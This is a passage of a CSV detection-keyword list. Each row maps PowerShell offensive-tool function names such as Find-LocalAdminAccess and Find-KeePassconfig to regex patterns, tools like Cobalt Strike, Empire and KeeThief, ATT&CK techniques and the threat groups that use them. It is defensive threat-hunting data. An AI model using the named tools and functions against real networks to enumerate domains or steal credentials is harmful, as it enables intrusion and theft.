AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","45049"
"*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45050"
"*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45051"
"*Find-GPOComputerAdmin*",".{0,1000}Find\-GPOComputerAdmin.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45052"
"*Find-InsecureResourceDelegations*",".{0,1000}Find\-InsecureResourceDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","45053"
"*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45054"
"*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45055"
"*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45056"
"*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45057"
"*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45058"
"*findinterestingdomainsharefile*",".{0,1000}findinterestingdomainsharefile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45059"
"*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45060"
"*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45061"
"*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45062"
"*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45063"
"*find-interestingfile -*",".{0,1000}find\-interestingfile\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45064"
"*Find-InterestingFile*",".{0,1000}Find\-InterestingFile.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45065"
"*Find-InterestingFile*",".{0,1000}Find\-InterestingFile.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45066"
"*Find-InterestingFile*",".{0,1000}Find\-InterestingFile.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45067"
"*Find-KeePassconfig *",".{0,1000}Find\-KeePassconfig\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","45068"
"*Find-KeePassconfig *",".{0,1000}Find\-KeePassconfig\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","45069"
"*Find-KeePassconfig C:\*",".{0,1000}Find\-KeePassconfig\sC\:\\.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45070"
"*Find-KeePassconfig*",".{0,1000}Find\-KeePassconfig.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45071"
"*Find-KeePassconfig*",".{0,1000}Find\-KeePassconfig.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","45072"
"*Find-LAPSDelegatedGroups *",".{0,1000}Find\-LAPSDelegatedGroups\s.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","0","N/A","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","45073"
"*Find-LocalAdminAccess *",".{0,1000}Find\-LocalAdminAccess\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45074"
"*Find-LocalAdminAccess *",".{0,1000}Find\-LocalAdminAccess\s.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","45075"
"*findlocaladminaccess*",".{0,1000}findlocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","45077"
"*findlocaladminaccess*",".{0,1000}findlocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45078"
"*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45079"
